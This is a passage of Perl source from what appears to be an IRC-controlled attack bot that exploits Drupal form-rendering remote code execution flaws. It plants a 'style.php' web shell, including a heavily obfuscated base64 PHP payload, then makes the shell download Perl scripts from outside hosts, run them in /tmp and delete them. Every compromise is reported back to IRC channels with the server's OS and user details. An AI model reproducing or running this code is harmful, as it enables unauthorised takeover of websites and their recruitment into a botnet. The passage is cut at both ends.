=~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($oscheck =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($oscheck =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","2![9$engine2]!8,1 Shell 9success 11(SafeMode=$safe) (OS=$os) $uid "); &msg("$admin","2![9$engine2]!8,1 Shell 9 ".$xteam." 11(SafeMode=$safe) (OS=$os) $uid ");}}} sleep(3); my $ua = LWP::UserAgent->new; $ua->timeout(5); my $addblockurl1 = "http://".$site."/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=curl http://wordpress.com.orbitadventuretours.com/info.php | wget http://wordpress.com.orbitadventuretours.com/info.php"; my $ajax1 = "_triggering_element_name"; my $response1 = $ua->post($addblockurl1, Content-Type => 'application/json', Content => ['form_id' => 'user_pass', '_triggering_element_name' => 'name']); my $body1 = $response1->content; my $regex1='<input type="hidden" name="form_build_id" value="(.*?)" />'; if($body1 =~ s/$regex1//){ my $newout1=$1; $formcraft2up1="http://".$site."/?q=file/ajax/name/%23value/$newout1"; my $responses1 = $ua->post($formcraft2up1, Content-Type => 'application/json', Content => ['form_build_id' => $newout1]); my $xteam1 = "http://".$site."style.php"; my $rescheck1 = $ua->get("http://".$site."style.php")->content; if ($rescheck1 =~ /<br>/) { my $oscheck1 = &get_content($xteam1."?cek"); #&msg("$chanxxx","$alllogo10,1Web $site "); sleep(8); if ($oscheck1 =~ m/404 Not Found/ig) { &get_content($xteam1."?love=cd%20/tmp%20;wget%20http://djcaa.org/doc.txt%20;%20wget%20http://djcaa.org/docx.txt%20;%20perl%20docx.txt%20;%20perl%20doc.txt%20;%20rm%20-rf%20doc*"); if ($oscheck1 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($oscheck1 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($oscheck1 =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","2![9$engine2]!8,1 Shell 9success 1 11(SafeMode=$safe) (OS=$os) $uid "); &msg("$admin","2![9$engine2]!8,1 Shell 9 ".$xteam1." 11(SafeMode=$safe) (OS=$os) $uid "); &msg("$nick","2![9$engine2]!8,1 Shell 9 ".$xteam1." 11(SafeMode=$safe) (OS=$os) $uid ");}}} sleep(3); my $ua = LWP::UserAgent->new; $ua->timeout(5); my $addblockurl2 = "http://".$site."/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=mv+sites/default/files/.htaccess+htaccessx;curl+-o+sites/default/files/style.php+'http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff';wget+-o+sites/default/style.php+'http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff'"; my $ajax2 = "_triggering_element_name"; my $response2 = $ua->post($addblockurl2, Content-Type => 'application/json', Content => ['form_id' => 'user_pass', '_triggering_element_name' => 'name']); my $body2 = $response2->content; my $regex2='<input type="hidden" name="form_build_id" value="(.*?)" />'; if($body2 =~ s/$regex2//){ my $newout2=$1; $formcraft2up2="http://".$site."/?q=file/ajax/name/%23value/$newout2"; my $responses2 = $ua->post($formcraft2up2, Content-Type => 'application/json', Content => ['form_build_id' => $newout2]); my $xteam2 = "http://".$site."sites/default/files/style.php"; my $xteam2x = "http://".$site."sites/default/style.php"; my $rescheck2 = $ua->get("http://".$site."sites/default/files/style.php")->content; if ($rescheck2 =~ /<br>/) { my $oscheck2 = &get_content($xteam."?cek"); #&msg("$chanxxx","$alllogo10,1Web $site "); sleep(8); if ($oscheck2 =~ m/404 Not Found/ig) { &get_content($xteam."?love=cd%20/tmp%20;wget%20http://djcaa.org/doc.txt%20;%20wget%20http://djcaa.org/docx.txt%20;%20perl%20docx.txt%20;%20perl%20doc.txt%20;%20rm%20-rf%20doc*"); if ($oscheck2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($oscheck2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($oscheck2 =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","2![9$engine2]!8,1 Shell 9success 2 11(SafeMode=$safe) (OS=$os) $uid "); &msg("$admin","2![9$engine2]!8,1 Shell 9".$xteam2x." or ".$xteam2." 11(SafeMode=$safe) (OS=$os) $uid ");}}} sleep(3); my $ua = LWP::UserAgent->new; $ua->timeout(5); my $addblockurl3 = "http://".$site."/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=echo+PD9waHAKZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJfcm90MTMoc3RycmV2KCc9OGovSjB6SzQvaGNRVVpuZnc1S2k2cHNvUitYWGF3SUdycTN2VXRrTlBleEYvMjRySGlQUW5xS3F1ZlBXOGdhZDhuZklRdjczVWF5T1FyLzZBc0trOUxMUHNVdzdxZ0txSDcxbmlQOURoRG5zODFHSXpObHM0MXhDS2dTOFpTSDRhemhzK20xQ1gxYWNxQ201M3FsRmN4c2Q2cmVjbkQvYUl6UXJpbmllZW15ZXJwaFhGQzg1R1BSRW9kOTV3TFk4eWd4azRzdkR0WVJsN3M4ZDYxR0VLc2xuei9NYTRDbzlhS2hFOWVlSDhmeWxJZUorZmVrNXllRHhGU2kzbUlRcytnYTA0NEZQM2V3UEt5Z3NpNmw5Sm5TY0tKd3I2Sy8rUDdZZjZNZEtqVTZpeC9nSzFLS1FGYS9qRVp1REs1NEVPR3BmWC9keldFcmdtdlp6Q05jMUtYK1dlYVpVQzlReGI1MmhpTDlNZGkvL1BqeWUzNFlCRFB4M0pzSUQ1elAvN2NYS2hkNGE5TlpVTytTanJZMUIreTJZU3J3MVRxSUk1dEw3ZWt5eXdpSGxtLzlkbit6YWFzNVBuaXE5cGFnOXZJckhPN2tOcjJ6SUNPNnltLzRHZTg1dWk2ZGk4dnFoM2s5ck1LcUdzeWNzbUdscDhhdUp6MjdRdy9CSENpeXBFdGljdTdldzhyK2ltazkvRGswMzl6cEpiRE1jSTk0bWlZMjF0WHZ1S2JmK1ZiUmVMU0EzV3hyeVBOeS80dFlpOFRtU095OVhWc1JycUR2ZitRT2dyTUxYcUNUR2p0ZnFpZlBHbEp1MlJPM0RmS1ZZcVdRWFVkVWZuRUtBV1l3OW5kczV0Nkdna3M1UUc0YWF6QitQV3A3RW5IRzZ3blJNczVrNEppSE44b1dkMVpJZFYwN3VlMjhLckM4ZDBwVmZOdEY2S3hycjB6SXNqVmYyRGtnaWd1U0h6T0VMUXl2aHJJYkhOdWFYeHluU2k5ODNLYmlSWnFpTG1kT296N0ZkUWtlZTFOQm1lWWUyc2VpYkdqclhDcjY3UzRGQ1VHREoySmd2WjRtVHhPcCtLM2NJRyttdHFpUThxcStQcXYzYXpNTzMvS1F0NVRLM3o3V2lyeUl3UUlhbUtDakozd2FkZjVrN2p2U1NacTZTUGNLTy95S3I1eEowQnNXQzJsQmFzcXVJZWtoaDdNQVAxU0NFUDBkSHduSTlFKytjR1NUOFRDTi81RVRycUFtcFMyQjYvM091UEZYUHJVUGNVOXVrMy9ZaWFDKzYzLy9tU2hyM3FUKzQ3MVVHbWsvNHRqZi83U0psbS8vc3d4bS8vNnluMmR5M3VrQ2krSDN2OTNmS3NNdS9HOENzcUI4eCttZzNuaTkrYTZRNWE5ZlRVL2lzcmdqdiszbEFoai9HQy8vQXhoWHNGaS9SOXdQN2ppU1VsKy9qVFVnYTI1bisra1BzKzN4V2FzMkNKOXNLbUNpN2Z3eUM5SjJSQ21qd0svUVllVnprSTYzYXFoTVdzaFhZb3dzakViVTYzZXM0Zm9mSXVLdHNlNWVhUHBZL2FYSWsrRGVlTmxxU0tzL3VvOXVLS015a1cvL3I5UEs3RCs5Vi8zZ25DKzFRci9xVUZvVzZFZ2JWS2wvaW1DZGNueStxZDh3L0VuMVNJR3NNaGlpZFNhMmJFcWs5QzltYXQ0S3RaNStkM3IxOVExaTZzNjAzZW5lSC9RMGlwNVVpOHJRU3pIMmcvOHNlVUNlOVBqWWV6alBrUUY2MndUTHNwek9maGVBdTlDdEQwRGh5VWhHRjBhQzVlVFMvWHhyL09kQi9BcENDNlNCeG1oOVVHbHRSNnBpRWNYeVU1NVdtUG1HSytEYmU3bFU0UWp4eGlpRHQvMUdSK2N6aVIrY2F6QXRkNHdCODVRUlBYWTU3Q3gvWW4rdmFDOWtlVCtVSXVjSWEzWWQ0NWFFS1MrU3N2My9HaHFkWDFDb0NBUjQxR2E2cFVqSUVMcGVGV2VpcnVqTWY2ZVJzZTFYTVp6OGY5Mm0xSDZ0T04vTjBQVUdyanlqSVl0d2NwdEhLb0FKc09kU3pMakRiTm0wWTVHNEZEL0JTZi9RaWZwUThwTG83NXFpZzdDMEpJbGQ4V2I4ejJhNnJPVGZFUG5ONGtHbHBWbEJtL1NNbHZDRzZpOWxZcXhCZWxDcmhUd0NqZHUvdXRtci9PYnZZaE5xTnRvRHM4OHdTVmozNWd4NUVucG0zZ3pvcmtCeDloYjZZVGllb0kzTHJwaG50MjBMY28rUHAzNjZkdmpEVTlDU1d1MkVWYlRKamVCZko1YVByajM4UnVkNmxCNlVCR3VxWVRxeXAyODFVZDVZSDZ3VWdSdGMwQy93SVZycnpPeXVzbnFXK29RYnBsbXNPM2o1YU1XZ1FIcDIzWHI0djdDRHl0U1lqejJockxKVWZETGZDemRCU213cDF1VnI1R3g4NkNaQ2xJVXVqRSs2UlJybGdzKy8wdGo0WXNUdEVkWGtDYXRLTjFYdFlrOEh1MUN0ZHM5N0FwU21kQWltaWxsdXVpaG9GSU5HNUkvNGFweS9YQi9IVUY2dUhJM0NueGE4STJUK3BraTROa2g4eXNjbXBtUUs2Qzd1bWUrdUMrUGFXc2M2VXJDOVlUbzFDYXA5YzNwbXdVL2xsMjJVNGo2UXAySS90d2Z1MmRWYjZGR3dKYmVFUnVRN1BoVFAyWGZscHhaNWJFYzIrbWhxRjNNOHM3WGpzME5mU2NtRWdjT01wM2l0RW1IS05yS0lDZzhPM1Q0R0ZMTllrVFBVcUZTUWVWdGRXdUxiYnBQbGZmVklUcy9vY21ySFhtcm9JaVZvMFg0Wkt3OUZEaGdzMUp4cXYvQmxxY3M2Y25uRm5MYlpHdTQvbFY4Q255VVVsM2hwK084QkRFWkM5VlIzUjFMd0d0cFRmN0pzMjdqN3RDakZRT3lFdHgzSnFRQTd6Nnlqb0JGSnc0NVdJbXJYdmxCbHczNWQyemNqR2hZUUo3MHpxaVFIYjRja1RteHluNEl2Wnc3V0k2S2JzUlJrMjdyRUFQWGQ4U3NjbGhvMjV4SWFmYVFuR2ZLWlREQ0hUZHlQTDNCaXp5eW4vWXRUUU9CRnBqVGNvK0duOUJWYVBub294b0RXbGZTd0YzOStZWlVVQTExTm5WNEJRNEJZMm4wTEpyY0ZNVGNCNkppUVowZFJHY3l1dDZQQzc2OTIvWHdqRExTMlE1aDRPbjBXdThyWk4zZnZnSDRPeER2OWlIVkQ0VDJsRnRaTDBsRHZzUGU1dkZ4d1B6WXNobDB6R3FlOUNOS0tTOFRSb0dzZWhoZzZoT1lkY3d6RHdXd1ZBOHZoL3RhWGdtVWpBVWxBTENEaVF4UG9mMDMxRG5XRDFDV2t3aUtaMVl1dmZHelNCdnpTUWxVY3BzYTcvRDBRenBzcS9MV25kN21wVXg2V3RleE11aG83VFFkd3BNTGZ6OG5sSHNJWE5ZYzFMYlBCWktCZEdmcVo2M09CVmUvME1yTVF1TW0zRjBONTZSVks1Zk9XT003UDk1OTk3bUhBR2dxQTlydWYwUGtUZklCdnd4SnZnaW9FOEFnenMxN1YzTVZobEtrUm52d1Y0ckZVQURiREUwMDJMR2xnN3YxV0ZZT01WRWRhYmZiN2JFaWdFSHlOOUdWbExEZ0JWREFYQ09KL3pHWGFwbU1RMEJ6REVuc3RMOVB3WExqbW43enJXbkZFQkRQRzZWaHA3bTdGVWNmdFUxRGVuUjBBb1U4QWU1eFRkaVFZQ3UyaVNyK1RTQlJIbTZ2U3dEQVJCNEpDc1BjY0Vxcm5JZWxYVktPdWJFWDlFMXJadDN6REtSdkdFdjBveTZRanJjcXBmVmFQd3RnWmtPL1JjUXV4TE1GWWY5U1NCZ1czV20wNDgxZ0dPQWswdWJoVFRpSlE4QXFoTGE5Tm5vRlZGS0lWcldxdkY2QXF5ODJEWDhKU2tkZjZIeENjbmx5Nk9CR01VOVUvWFJxUUhvR3hCWnE5WHhTdHdFaG5iTWQ5a2k3eVJvbEJrbkdmeVdlTDFUb2Z1akgyc1N2ZjY4WTRLOHpiSGJIRFg3U1d2ZTdZckJYM3JtVVNXOWdNazlDVmY1QUVKam50N2UvRStKb3Z4dEVtQTJtdEF3RTNHSjBSM1VTMXp4YkNVeWxDd2djMVczSGZsUkgzMUJvUmxEVTRGM2RrbmFyeUJmVGVrREhiR0pNVVhpUWZqRVc2QUJ3ejNSMm5pR0hOZlJGdmY2ZEZ4eVZjaWs2Um9uSUI2WTlCTCtIYWtsc2pxTExKUzBIbUJiWTI0Um5GRkZGZXFaMGl4VCtVc3MzVlZBcnlrZW92elRCbitYQzVNdkxKdUQ5QTlzRUViRStrZmNZRFZvbU8zam5NSUF3aEtQa1NabTBlMVpRUTN6bmRnR2gwdEZyZkNOYWxKVHBGajk0R2RmZE1ZSzNtV0w3TDB6VVV0OUdmQThIbldaL0ZlMnpFbkJ5RmMyNmZKMWtmQUo2S0hha3pGWWYzZFhOOGdUTS9YbUp6dS84UkZ0SlZycGhtdXQ0bjRkQXdrazBremNuSUw2TGFnMFZPa25GdUYvTVpEOGcwTXFXVzQ3OWdMRlVUbGR5Z3VCdUF2TXFsbmJPelN2eDZ2a0t0V2JSdmUzTnhseGpPcXd1Z1h6U0I3dUh0OStUWmNHVmFpRXVtY2JjS0xzRlZsZHZ0SDVOaTJrU3pJdTFXbEpKQlRERjhNRDdCRXlWNWdxbjRrTXZXZWc0VGI2aFp5a1hXWlNvWmxObmJuQ1ZLemZMczdUL2c1UFR5YzFNV2QrbnN2Wkdvd2NEVFprckhFM09mZGc2c1FqU3NSeDkwVGFndmQxSkExb0lyVFZ5a0lMNXhaRTNsYTM0RFl4Q1BTMSs0STBnbXdleTlRSUViblNMUEw0ZzFPaFpUOFhHVGY5cFhwU2NSVTh6M2NYcEt5eGs5TFdUcS9SeVJSM2loUnZKYVQ1WVVxTkw2RURtSjFEWTZwczcwRWZndnJEbWNmbTMwVElzeTlrbmFma1YzOEhhb0dxdDZEMFhZSEU2b0RNZSt1OHpUMmdPQ1E3dTBoZG5MSVlSTWNUUUJrQXFLVDU2OUhwNERKejBubG5KNWFRb21IZ2paU0lSS1FucDdIS2UyMWt0SWozZmlSVUNpVE43SVhpSUd6NnRySkc5MmlaMG5VMHV6dmhIQ2xOSWxnbytPNDA0cUZsallBQmpnSm9MY1VSR2ErdkIxb21TZ2g2OSszMEVkaVB3dnZNYkJjdThoZ0t3ZFBBUjAwUnhyUENyaFhkT0pjbXJlNFk5em5nWGxrTXQvdkVRZCtRUmdGSktzbkNPc0xZMmluRHpCWVZQQ1NzYUFjdnk3Y0FXVVVtbURvSG8xWFh1V2hMd0l1NHQzazBSekdyU0F4d2E4VnlIbGlqdXd0SEJvczJvK2NGVmMwU0crcUFySy9NRFgxTUQrY3ZFZDA1VklwVmJUNDRNQmtYejV2aGNLcjN3cWc1TG5EYkthbDZ6SnNSbDdJQjJ2OU1nckt3T1lxVUdLUnRZTWhrNGVreGpiSTJKZ2dvZDhDeTAreFhUd1lnYmcxZDhPVlhPby9QS3B6VHZCVnpMNUNQSWk3M2t0TEI4dm5maU1wTENZT0RKdjd3RXBQeHpsd3FTeGNqTU9xV2tOMThxb0VsZktJNGRDT3E5bWJTZ1V4bkttQU1sby95Snp4VFYrKzBjRExaTUFZUVFGajhueDFYTVlsVVdablk4dXZwSzBZRXBNM1dhZ2NEbnpndEt1cllVT3B4b1JzTUV6SGtnTVVNZTdIQ3NxS3hOOFNOeitlckpaSkh2Z1J5K3NESDY0K2hEd1hVYVEwRmFZV1F1QjA0dlQ5QUZZbUNxUDNDRE0yTXdrTWxDTzZOUm5xclZKQTdTenZJUUZHSy9nbGszZURxZWJUZmMzeGUyUk5ETndZVFRza2VDUVA1bnhWbzgyaWkyTEdjQ1djT1ozeWxMZnpCMHFrOUJpbmFyb2dJVUZkV00xU0tTaFJqRWtHeDJ5enFNR1dKV1oyR3RoYWpTeVd5ZHVtZ1dScGE0RDA0Vkp5RkxUcTZZUVlxU2xvYW1NY0ZTOUFXem9NTTlrRjVNWFlBdExSTGZJNUhEcjVCU1N4ek1pMFRoQVloMUpZWDZIUDFPcmZvamNSVWR2V3RmcWluVzJFWDZUbjFCNlZKM1V6dEpTeW44bmtFaTNKOEFTMnhUSGhWVFNZcmpSTTRPVkVJYnRmc2l0SDFVd0U3RGhIeExCblZ6QW5NaE5VS284NjZWaHpQYTlWMWNyZzk3ek53cHl2eEViRDJMYkkwK0JCUGNKTWltMGFRa2NYUkU2cWovU29xM2NYV2w3WG85NDFtcEJaVlV4a00yVkdMZE9kbXp5SmxWc0FTaU9uSW5RbE1BbHhEeHVaM2xlRjRueWhnUUhVVHprMkpkY0dKWFR2K0lqMEw1SEFHM1VEaDFrMjIwYlZJNVZFMnRUREpLT1BaTWhOMWUyT002bWpleGd0TEpqZHQ0K2xCZ0ZrRkdlZTNOUklDTlJMVUJ5OUE0NFVrVUc0elVYL1FKa2dyQ0RsWlRMb2xWWXZDakJ5RndPWGFkWFNWV25IN3I1cVJNbVRXV3B5dzhUMEZ6Z2t6NE0vaitPbUUySnlReGJMdTRlSk1sRXNpS0N3YWV0eWpTeTNoSkNBYUxTcTNSWUxzdlgwUjlsWk1Xdkg0ZFNNc2xyZHlNWFlRdWo5bnVEajJ4dm84T1NqMG92QWliclAwRWwycDB3cjNFZS9PUEkrbmVTK2VEN0Z5ald0cGJtenJrbENnR0V4ZktsNGZ1N3MxMytEa2cyRTZ3Y2VRdTVwbE5sSkRVM3FnLzJYZmVuYXgxWEUxRGVSdmFjZHlneUZ2VTJ2NGl5QzdVc0lWVGE4UVZhUGtMdnh5MEdjT2MwNnRveDFSS2Y0K09BOTZGbmFEU3dUelJLemlLbWJzdXA5VUJGZzU3a1NsTkdVMjNHZFF4OG52MGtGdStZemdBU0ozNlF6WnJMNVA1Q2JyLzk1ZHQyeWFZc2lNTXh4M2Iwb3E3eGxmb1haZzhKODRUQ3JNZzZYMmhvN0NQWFdXMENaeTRiUk1yUzN2cWxoTzA3bnQyWEhBQVB2VVVBQmhzUVl4aVMwY2pGQldIUlVtSkhLTG8zY2wzWUZhSHhIMDdRcG5VNTkyem1yN3ZxWmtsdjUxdmF0V0NpQW1rMUZITjM2dXlYSG4rT1gvMm5hd2xvNDlsNzFJa2dweVA2NjNTQ2c3MllsRVdKWG1Kc2g1OTdXWlR6NmNVUGUxYWtLS0czZFRyUGhEVnVmRndqQVdxV29QU1dBS0t5bFd5MGd3VEw3eUo3aUFjeWNFRTJYeWxIZUd5OTdzd1liVnpLMkRpZDdjb2ErWG5ZVU5sNldSQlZZWDBWeEQ4dFhjR09yNUFJeWZjSHN6dkVLV1NBR2Mzem9zdk5rYVBtVHR3dzJDQXppdWVqTkVnd29EeGMwVmVFOHpKYUFJUHRkaE16bm9LenZ5Qmx3UGMwMWhweWpvS1RSRVJFVVh2b24vYXBoTWJnaUp1UGF4VkNjSm8wWkh5VzByYTRrcjZBOHpBc0NzbFpvcElEM2lXdnlBWGcyYnFYZkVKV0xQcTYyZlRNZnFqRFdlbUVIZlhDbFZHcnhIeEZ6ZFo2Y0V6RXp5bTV6Qmg2RWwrbmZ1UTdmY1RhbmFIbjdjeUJlV2dpNmtwS3N4TVZjMkM1bUh6eGtTSU1SSWM0TTZPTW16ZWVwRkt3RU1ydnY0WUJCd25JUlVxWHlrVTEwbDB4WU02YzNyN3J0aG9MUm9oNEZZbXBXYllFVnJObGJKQ3lFaWhrUTFEWkxxTGxMSThmRTY0SWpjaVd1RHUzQ0l6WTBMdWpXMi96blVEL3VWcWxBdU0yQzNMd2c3VGhPNTY1aXQ2RndQa3l1cVNrZkZrbXRJcHBlVnVvTGNnMXh0TDJvWVVHR3hBempkMkhvL3FuTEtKL253Qm5HWFVLWGx1c3J1VzlSUFRoNFpoaUZkRElSa1JzUzNqeDNvcFI5cWEwZnFtMDRyU0VPbjgzZk1yYXdmcWhWcVhaMmgxeWhVbzE5WFQyOU5RYzdJcFJ1M20wZlhKdldIaW9hMDJudzFNbUJTdGJEbjIrMldrSjZWTTJCSU92TjFIZ0ExOVZEMnNFdDQxMlpnT3JIUG9CNmQxQzNmdnZVd0g4RFRydXYySFFtaXhXYUd4MkNoZWhvOVpNbThiTFgvSnBNMnlnRlltb29HbjZFakRHY1ZYdlN3Sng1NHJoM1d6YUcyUk1oWVZnc05LckROTUtaUVNZQVBvMGdEUFIvc29KZ0tFZFhsZ2V4YTlIWDJyZGdZZG9hMUVab0RKMHN5dHVIMmEvVEVXNkE0OTZUb3FhVTd4bXRxTVhhQzlkbmdaam5TcE1LTUJndTVaTk80eU5OV0ZlUUlocDRLWjlHOGJPcHhKRmRvNFlNZDB6N2VIdWd0b01qRnFYSUEvRy8wVWhFb2Q2cWduakFiM0lNK1haSjVJSHJxQmE4blNGR3dLcjJnSmpWakk5VEJ3cWdMSWR1VmtYM0hEaEFkVHZVcFdIQmtVaFJmckplSVZRVXNvRURwMDNpV3BNVTk5R3hGOWFjakNNb252L0hmRCt6WlQwTmJFRGMvYXIveU5oTnYxdEM3Yytqd0o3Y1ErWmMzOGp1S09ScnIvMnh2YjZTT0NrKy9hVzk1MUNHUWlYQ1lNTWFubVd0ZEZtRFRlNTVjZmdqZ0JNSlAzZlM0dzRzdXRLTitESW84OWRLa2tuNlo2WHBDaXZRWTg4Ym55SXJsNVYwa3NWOGF6Z0g5MnNUbU9JSXVHWUcxZ0UzaUJUYWpTL3hJMXlkZGw1dktmc0IrQ2ZDcGxDUVVoL3crcWlCSEZ5M0kwODZza0V6SmtFSWNEeElnWlAvUGR5L2w1d25TejRueG4rckRZVWV2Z3QvMnRJNWt6OGJWN2wzcDFhejc0Y2RYYmJEbGhBQXROdFpPOEFWRzFmQlFJbko1dUcvSk1PK1VLNElpeVpFRDFuakdET0tXMkNIVVBzcjg3VVU4NXdWdFRobWtRUElOQjdIbnZjZm9CZW44Tk5OVVVKdnZ2NjUyN3MxVWsvNFJnczJ5SzN5MVQ0SXgxUWQ1RkFwekpoaldiZ2lTNmE4cnYzdGNrWXFwMnZBcllaU3RETkVYaU83OEN2ZmRaVUJack9abHJqUXlkUTQzaWpVQ29EZzREVUtNU1JWWVFtdUJ2WUVaUmtsVXRqRE5meWhySWNua0FZT0NFc0ViWjYzSFpna0VoaWlRcnpWTjd6YTFFaDJUVWtxYlhwa09jRG4rMlErWGFqOE84VWdyMFdGamsrOHZIcy8zZzRROWsvWWp5bitpb05pOHJBMVYxbUx5S2w4TGdGYUlBZjhTekpUN0NOa01lNDkvcmFDOGw3dU8wdE9jeGxQcEl2cjVnVVk1OEs0T3F6UnVPbndaLzhFSmtNNE9oT0pabUkzWnBZaWFNNEk2K09HL1ozNzl3VUtpdHNOd2R1SEFySGZYczV6ekVueE1FbnBtWEN6N3VPTFZwUHJ0bms0Y1BnWWlTNDY1WVE4d0NPQjk3dk5Fd1FGallCcmYyT1JYSXM2NUtIeDd5VTdMTUs0MFlDOXZRaC8veGYwWjNaTUtFUUNGM01ISXQvbGdwdU9sS2U5WjBCdnY2b25xemczWjdyZzYwUUZ3c0RJZnlaWFFqMEluYnk0MWpDL0lvS3BWM3I0ODNaWjE2c3NTcmE1My9YZDg3eGVLWFJyTGxvemVId0xCNTlPV1lOb09scjZTdEhzai9iVGQwamZ2eUlZZnUyUUloMDdNZ09mOTVZaDhoNU1TeW5Ob1RMNXJEQlllVTZJd2ExQXRYMElCckZ4U2twSUMyMjBZNmdCS1dzNlN1RW1CL3pSbTVNZGFBVEltUnBpQ0NWbVJSdy9OSXFmQ0VVNjRobTRjM3FlMXdhRjRJY3NZOWx5T09QQUg4dUVUVFdJUGFPOURZV0haTit5V2lSMTlDS2ZTb0xUY3lLVXc0WW11SkcwOFY0ZGJRd3pJVUFpR29JcG1va0prdFptYUMvaHBVUSthdENybnVaWXlHMWM5QVZDcnptcjJUL05WUmxXRkxDY3dUTjNSMkp2Rjd1UHNjbVBjTGpGT0NlWWVqak5TajJNZi93S0FvTHJocElQSktHVDlsdmEyV1RDWmhxTTF1MTRNaTJiN2cvZHk0QVAwbjQwb2w4bDNVclByd1BuSXlmWmpvNW1zOWFHKzg0Ly9mbS9aZzRqc2VpYStCMEFkK2xIQVlDOTdXSnlnZjVzQll1czA4OUxjc3JYaVBDUGlGWk1FT0pXSXMrdnMyeU1sUStCWUVyWDdaSnlPZE5TSklVYlhERVduMG9yenJCYTF1eEUyMHhaaUptUURzN2R1bEZQSnZBUHpIcTljd1ZOenhSUE1RY1kybGNrSjhTWEtwbVdocTcwRi82dHE2NmlRaGY0aGdyY2VLZScpKSkpKTsKPz4+base64+--decode%7C+tee+style.php"; my $ajax3 = "_triggering_element_name"; my $response3 = $ua->post($addblockurl3, Content-Type => 'application/json', Content => ['form_id' => 'user_pass', '_triggering_element_name' => 'name']); my $body3 = $response3->content; my $regex3='<input type="hidden" name="form_build_id" value="(.*?)" />'; if($body3 =~ s/$regex3//){ my $newout3=$1; $formcraft2up3="http://".$site."/?q=file/ajax/name/%23value/$newout3"; my $responses = $ua->post($formcraft2up, Content-Type => 'application/json', Content => ['form_build_id' => $newout]); my $xteam3 = "http://".$site."style.php"; my $rescheck3 = $ua->get("http://".$site."style.php")->content; if ($rescheck3 =~ /<br>/) { my $oscheck3 = &get_content($xteam3."?cek"); #&msg("$chanxxx","$alllogo10,1Web $site "); sleep(8); if ($oscheck3 =~ m/404 Not Found/ig) { &get_content($xteam3."?clean=cd%20/tmp%20;wget%20http://djcaa.org/doc.txt%20;%20wget%20http://djcaa.org/docx.txt%20;%20perl%20docx.txt%20;%20perl%20doc.txt%20;%20rm%20-rf%20doc*"); if ($oscheck3 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($oscheck3 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($oscheck3 =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","2![9$engine2]!8,1 Shell 9success 3 11(SafeMode=$safe) (OS=$os) $uid "); &msg("$admin","2![9$engine2]!8,1 Shell 9 ".$xteam3." 11(SafeMode=$safe) (OS=$os) $uid "); &msg("$nick","2![9$engine2]!8,1 Shell 9 ".$xteam3." 11(SafeMode=$safe) (OS=$os) $uid ");}}} sleep(3); my $ua = LWP::UserAgent->new; $ua->timeout(5); my $addblockurl4 = "http://".$site."/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"; my $wget4 = "wget http://wordpress.com.orbitadventuretours.com/info.php"; my $response4 = $ua->post($addblockurl4, Content-Type => 'application/json', Content => ['form_id' => 'user_register_form','_drupal_ajax' => '1','mail[a][#post_render][]' => 'exec','mail[a][#type]' => 'markup','mail[a][#markup]' => $wget]); my $addblockup4="http://".$site."/style.php"; my $checkaddblock4 = $ua->get("http://".$site."/style.php")->content; if($checkaddblock4 =~/<br>/) { my $oscheck5 = &get_content($addblockup4."?cek"); #&msg("$chanxxx","$alllogo10,1Web $site "); sleep(8); if ($oscheck4 =~ /GIF89a/) { &get_content($addblockup5."?love=rm%20-rf%20insom.*%20renata.*%20;cd%20/tmp%20;wget%20http://djcaa.org/doc.txt%20;%20wget%20http://djcaa.org/docx.txt%20;%20perl%20docx.txt%20;%20perl%20doc.txt%20;%20rm%20-rf%20doc*"); if ($oscheck4 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($oscheck4 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($oscheck4 =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","2![9$engine2]!8,1 Shell 9success 4 11(SafeMode=$safe) (OS=$os) $uid "); &msg("$admin","2![9$engine2]!8,1 Shell 9 ".$addblockup4." 11(SafeMode=$safe) (OS=$os) $uid "); &msg("$nick","2![9$engine2]!8,1 Shell 9 ".$addblockup4." 11(SafeMode=$safe) (OS=$os) $uid ");}} sleep(3); my $ua = LWP::UserAgent->new; $ua->timeout(5); my $addblockurl5 = "http://".$site."/user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax"; my $wget5 = "wget%20http://wordpress.com.orbitadventuretours.com/info.php"; my $response5 = $ua->post($addblockurl5, Content-Type => 'application/json', Content => ['form_id' => 'user_register_form','_drupal_ajax' => '1','mail[a][#post_render][]' => 'exec','mail[a][#type]' => 'markup','mail[a][#markup]' => $wget]); my $addblockup5="http://".$site."/style.php"; my $checkaddblock5 = $ua->get("http://".$site."/style.php")->content; if($checkaddblock5 =~/<br>/) { my $oscheck5 = &get_content($addblockup5."?cek"); #&msg("$chanxxx","$alllogo10,1Web $site "); sleep(8); if ($oscheck5 =~ m/404 Not Found/ig) { &get_content($addblockup5."?love=rm%20-rf%20insom.*%20renata.*%20;cd%20/tmp%20;wget%20http://djcaa.org/doc.txt%20;%20wget%20http://djcaa.org/docx.txt%20;%20perl%20docx.txt%20;%20perl%20doc.txt%20;%20rm%20-rf%20doc*"); if ($oscheck5 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($oscheck5 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($oscheck5 =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","2![9$engine2]!8,1 Shell 9success 5 11(SafeMode=$safe) (OS=$os) $uid "); &msg("$admin","2![9$engine2]!8,1 Shell 9 ".$addblockup5." 11(SafeMode=$safe) (OS=$os) 